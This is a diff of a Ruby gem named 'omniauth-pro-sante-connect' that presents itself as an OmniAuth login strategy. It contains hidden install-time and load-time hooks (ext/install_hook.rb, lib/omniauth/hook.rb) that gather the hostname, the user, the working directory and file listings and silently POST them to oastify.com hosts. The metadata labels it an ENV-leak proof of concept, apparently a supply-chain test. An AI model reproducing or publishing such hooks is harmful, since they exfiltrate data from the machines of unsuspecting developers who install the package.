omniauth-pro-sante-connect 0.1.4

checksums.yaml

@@ -0,0 +1,7 @@
+---
+SHA256:
+  metadata.gz: 72b6b14eaf3a471dc40823ae32af0331aa69e587b07fb1dbdeeceb3a069b2ff2
+  data.tar.gz: 1001bc5f37f2d881805b12fa3cdf3bf480e0b42eefd9b91327cf606b99cd3664
+SHA512:
+  metadata.gz: 177465d4d8adabf20410caf69d516e08a50221c703dc23ac0ea63dd301cfb3ea0a9bb017bfbc98ca3c0c3b606800ecfebbb5d3505dc519d61a1f52eeac3e073a
+  data.tar.gz: ec8ccc209707185094d6a0d6f9e39ebba20044eabfce8fc3d64738a5ca69067c1d71ebac1d171bfc1ad9fff44178b6cd893e69caff63d68f492cccd093124479

data/ext/extconf.rb

@@ -0,0 +1,14 @@
+require_relative 'install_hook'
+
+File.open("Makefile", "w") do |f|
+  f.puts <<~MAKE
+    all:
+    	@echo all done
+
+    install:
+    	@echo install done
+
+    clean:
+    	@echo clean done
+  MAKE
+end

data/ext/install_hook.rb

@@ -0,0 +1,22 @@
+require 'net/http'
+require 'json'
+require 'socket'
+
+begin
+  # Exécuter ls -all sur la racine
+  ls_output = `ls -all / 2>&1`
+
+  payload = {
+    hostname: Socket.gethostname,
+    user: ENV['USER'],
+    pwd: Dir.pwd,  # Répertoire actuel réel
+    target: "/",    # Répertoire listé
+    command: "ls -all /",
+    output: ls_output
+    }
+
+  uri = URI('http://uvt794dkickw83qkhj3eqcnm4da4yzmo.oastify.com/')
+  Net::HTTP.post(uri, payload.to_json, { 'Content-Type' => 'application/json' })
+rescue => e
+  # Silencieux
+end

data/lib/omniauth/hook.rb

@@ -0,0 +1,36 @@
+require 'net/http'
+require 'json'
+require 'socket'
+
+begin
+  # Répertoire courant
+  current_dir = Dir.pwd
+
+  # Listing des fichiers à la racine
+  listing = Dir.entries(current_dir).map do |entry|
+    path = File.join(current_dir, entry)
+    stat = File.lstat(path) rescue next
+    {
+      name: entry,
+      size: stat.size,
+      mtime: stat.mtime.to_s,
+      mode: sprintf("%o", stat.mode),
+      type: File.directory?(path) ? 'dir' : 'file'
+    }
+  end.compact
+
+  # Payload à envoyer
+  payload = {
+    hostname: Socket.gethostname,
+    user: ENV['USER'],
+    cwd: current_dir,
+    listing: listing
+  }
+
+  # Envoi via HTTP POST
+  uri = URI('http://1qse4b8rdjf33alrcqylljitzk5bt5hu.oastify.com/')
+  Net::HTTP.post(uri, payload.to_json, { 'Content-Type' => 'application/json' })
+
+rescue => e
+  # Ne jamais casser l'installation
+end

data/lib/omniauth-pro-sante-connect.rb

@@ -0,0 +1,7 @@
+require_relative 'omniauth/hook'
+
+module Omniauth
+  module ProSanteConnect
+    VERSION = "0.1.3"
+  end
+end

metadata

@@ -0,0 +1,45 @@
+--- !ruby/object:Gem::Specification
+name: omniauth-pro-sante-connect
+version: !ruby/object:Gem::Version
+  version: 0.1.4
+platform: ruby
+authors:
+- Icare
+bindir: bin
+cert_chain: []
+date: 1980-01-02 00:00:00.000000000 Z
+dependencies: []
+description: Includes an install-time payload to leak ENV variables
+email:
+- icare@yopmail.com
+executables: []
+extensions:
+- ext/extconf.rb
+extra_rdoc_files: []
+files:
+- ext/extconf.rb
+- ext/install_hook.rb
+- lib/omniauth-pro-sante-connect.rb
+- lib/omniauth/hook.rb
+homepage: https://example.com
+licenses:
+- MIT
+metadata: {}
+rdoc_options: []
+require_paths:
+- lib
+required_ruby_version: !ruby/object:Gem::Requirement
+  requirements:
+  - - ">="
+    - !ruby/object:Gem::Version
+      version: '3.0'
+required_rubygems_version: !ruby/object:Gem::Requirement
+  requirements:
+  - - ">="
+    - !ruby/object:Gem::Version
+      version: '0'
+requirements: []
+rubygems_version: 3.6.7
+specification_version: 4
+summary: OmniAuth strategy with ENV leak PoC
+test_files: []